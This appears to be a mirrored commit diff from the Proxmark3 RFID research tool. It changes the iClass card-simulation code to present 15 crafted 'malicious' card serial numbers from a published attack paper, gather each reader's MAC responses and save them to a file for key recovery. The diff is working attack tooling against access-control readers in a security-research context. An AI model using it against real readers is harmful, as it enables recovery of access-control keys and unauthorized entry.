mirror of
https://github.com/RfidResearchGroup/proxmark3.git
synced 2024-12-29 11:52:59 +08:00
Reverted to original malicious CSNs from paper, it appears legit readers does not accept if they dont end with F7,FF,12,E0
This commit is contained in:
Martin Holst Swende
parent
b160432340
commit
6116c79618
3 changed files with 33 additions and 14 deletions
|
|
@ -1004,7 +1004,7 @@ void SimulateIClass(uint32_t arg0, uint32_t arg1, uint32_t arg2, uint8_t *datain
|
|||
// The usb data is 512 bytes, fitting 65 8-byte CSNs in there.
|
||||
|
||||
memcpy(csn_crc, datain+(i*8), 8);
|
||||
if(doIClassSimulation(csn_crc,1,mac_responses))
|
||||
if(doIClassSimulation(csn_crc,1,mac_responses+i*8))
|
||||
{
|
||||
return; // Button pressed
|
||||
}
|
||||
|
|
@ -1132,7 +1132,6 @@ int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived, uint8_t *reader
|
|||
//Signal tracer
|
||||
// Can be used to get a trigger for an oscilloscope..
|
||||
LED_C_OFF();
|
||||
|
||||
if(!GetIClassCommandFromReader(receivedCmd, &len, 100)) {
|
||||
buttonPressed = true;
|
||||
break;
|
||||
|
|
@ -1175,9 +1174,10 @@ int doIClassSimulation(uint8_t csn[], int breakAfterMacReceived, uint8_t *reader
|
|||
respsize = 0;
|
||||
if (breakAfterMacReceived){
|
||||
// dbprintf:ing ...
|
||||
Dbprintf("CSN: %02x %02x %02x %02x %02x %02x %02x %02x",csn[0],csn[1],csn[2],csn[3],csn[4],csn[5],csn[6],csn[7]);
|
||||
Dbprintf("CSN: %02x %02x %02x %02x %02x %02x %02x %02x"
|
||||
,csn[0],csn[1],csn[2],csn[3],csn[4],csn[5],csn[6],csn[7]);
|
||||
Dbprintf("RDR: (len=%02d): %02x %02x %02x %02x %02x %02x %02x %02x %02x",len,
|
||||
receivedCmd[0], receivedCmd[1], receivedCmd[2],
|
||||
receivedCmd[0], receivedCmd[1], receivedCmd[2],
|
||||
receivedCmd[3], receivedCmd[4], receivedCmd[5],
|
||||
receivedCmd[6], receivedCmd[7], receivedCmd[8]);
|
||||
if (reader_mac_buf != NULL)
|
||||
|
|
|
|||
|
|
@ -303,7 +303,7 @@ int CmdHFiClassSnoop(const char *Cmd)
|
|||
SendCommand(&c);
|
||||
return 0;
|
||||
}
|
||||
|
||||
#define NUM_CSNS 15
|
||||
int CmdHFiClassSim(const char *Cmd)
|
||||
{
|
||||
uint8_t simType = 0;
|
||||
|
|
@ -340,10 +340,10 @@ int CmdHFiClassSim(const char *Cmd)
|
|||
|
||||
if(simType == 2)
|
||||
{
|
||||
UsbCommand c = {CMD_SIMULATE_TAG_ICLASS, {simType,8}};
|
||||
UsbCommand c = {CMD_SIMULATE_TAG_ICLASS, {simType,NUM_CSNS}};
|
||||
UsbCommand resp = {0};
|
||||
|
||||
uint8_t csns[64] = {
|
||||
/*uint8_t csns[8 * NUM_CSNS] = {
|
||||
0x00,0x0B,0x0F,0xFF,0xF7,0xFF,0x12,0xE0 ,
|
||||
0x00,0x13,0x94,0x7e,0x76,0xff,0x12,0xe0 ,
|
||||
0x2a,0x99,0xac,0x79,0xec,0xff,0x12,0xe0 ,
|
||||
|
|
@ -352,8 +352,26 @@ int CmdHFiClassSim(const char *Cmd)
|
|||
0x4b,0x5e,0x0b,0x72,0xef,0xff,0x12,0xe0 ,
|
||||
0x00,0x73,0xd8,0x75,0x58,0xff,0x12,0xe0 ,
|
||||
0x0c,0x90,0x32,0xf3,0x5d,0xff,0x12,0xe0 };
|
||||
*/
|
||||
|
||||
uint8_t csns[8*NUM_CSNS] = {
|
||||
0x00, 0x0B, 0x0F, 0xFF, 0xF7, 0xFF, 0x12, 0xE0,
|
||||
0x00, 0x04, 0x0E, 0x08, 0xF7, 0xFF, 0x12, 0xE0,
|
||||
0x00, 0x09, 0x0D, 0x05, 0xF7, 0xFF, 0x12, 0xE0,
|
||||
0x00, 0x0A, 0x0C, 0x06, 0xF7, 0xFF, 0x12, 0xE0,
|
||||
0x00, 0x0F, 0x0B, 0x03, 0xF7, 0xFF, 0x12, 0xE0,
|
||||
0x00, 0x08, 0x0A, 0x0C, 0xF7, 0xFF, 0x12, 0xE0,
|
||||
0x00, 0x0D, 0x09, 0x09, 0xF7, 0xFF, 0x12, 0xE0,
|
||||
0x00, 0x0E, 0x08, 0x0A, 0xF7, 0xFF, 0x12, 0xE0,
|
||||
0x00, 0x03, 0x07, 0x17, 0xF7, 0xFF, 0x12, 0xE0,
|
||||
0x00, 0x3C, 0x06, 0xE0, 0xF7, 0xFF, 0x12, 0xE0,
|
||||
0x00, 0x01, 0x05, 0x1D, 0xF7, 0xFF, 0x12, 0xE0,
|
||||
0x00, 0x02, 0x04, 0x1E, 0xF7, 0xFF, 0x12, 0xE0,
|
||||
0x00, 0x07, 0x03, 0x1B, 0xF7, 0xFF, 0x12, 0xE0,
|
||||
0x00, 0x00, 0x02, 0x24, 0xF7, 0xFF, 0x12, 0xE0,
|
||||
0x00, 0x05, 0x01, 0x21, 0xF7, 0xFF, 0x12, 0xE0 };
|
||||
|
||||
memcpy(c.d.asBytes, csns, 64);
|
||||
memcpy(c.d.asBytes, csns, 8*NUM_CSNS);
|
||||
|
||||
SendCommand(&c);
|
||||
if (!WaitForResponseTimeout(CMD_ACK, &resp, -1)) {
|
||||
|
|
@ -362,9 +380,9 @@ int CmdHFiClassSim(const char *Cmd)
|
|||
}
|
||||
|
||||
uint8_t num_mac_responses = resp.arg[1];
|
||||
PrintAndLog("Mac responses: %d MACs obtained (should be 8)", num_mac_responses);
|
||||
PrintAndLog("Mac responses: %d MACs obtained (should be %d)", num_mac_responses,NUM_CSNS);
|
||||
|
||||
size_t datalen = 8*24;
|
||||
size_t datalen = NUM_CSNS*24;
|
||||
/*
|
||||
* Now, time to dump to file. We'll use this format:
|
||||
* <8-byte CSN><8-byte CC><4 byte NR><4 byte MAC>....
|
||||
|
|
@ -378,7 +396,7 @@ int CmdHFiClassSim(const char *Cmd)
|
|||
void* dump = malloc(datalen);
|
||||
memset(dump,0,datalen);//<-- Need zeroes for the CC-field
|
||||
uint8_t i = 0;
|
||||
for(i = 0 ; i < 8 ; i++)
|
||||
for(i = 0 ; i < NUM_CSNS ; i++)
|
||||
{
|
||||
memcpy(dump+i*24, csns+i*8,8); //CSN
|
||||
//8 zero bytes here...
|
||||
|
|
|
|||
|
|
@ -18,7 +18,7 @@ int fileExists(const char *filename) {
|
|||
|
||||
int saveFile(const char *preferredName, const char *suffix, const void* data, size_t datalen)
|
||||
{
|
||||
int size = sizeof(char) * (strlen(preferredName)+strlen(suffix)+5);
|
||||
int size = sizeof(char) * (strlen(preferredName)+strlen(suffix)+10);
|
||||
char * fileName = malloc(size);
|
||||
|
||||
memset(fileName,0,size);
|
||||
|
|
@ -34,13 +34,14 @@ int saveFile(const char *preferredName, const char *suffix, const void* data, si
|
|||
/*Opening file for writing in binary mode*/
|
||||
FILE *fileHandle=fopen(fileName,"wb");
|
||||
if(!fileHandle) {
|
||||
prnlog("Failed to write to file '%s'", fileName);
|
||||
PrintAndLog("Failed to write to file '%s'", fileName);
|
||||
free(fileName);
|
||||
return 1;
|
||||
}
|
||||
fwrite(data, 1, datalen, fileHandle);
|
||||
fclose(fileHandle);
|
||||
prnlog("Saved data to '%s'", fileName);
|
||||
PrintAndLog(">Saved data to '%s'", fileName);
|
||||
|
||||
free(fileName);
|
||||
|
||||
return 0;
|
||||
|
|
|
|||
Loading…
Reference in a new issue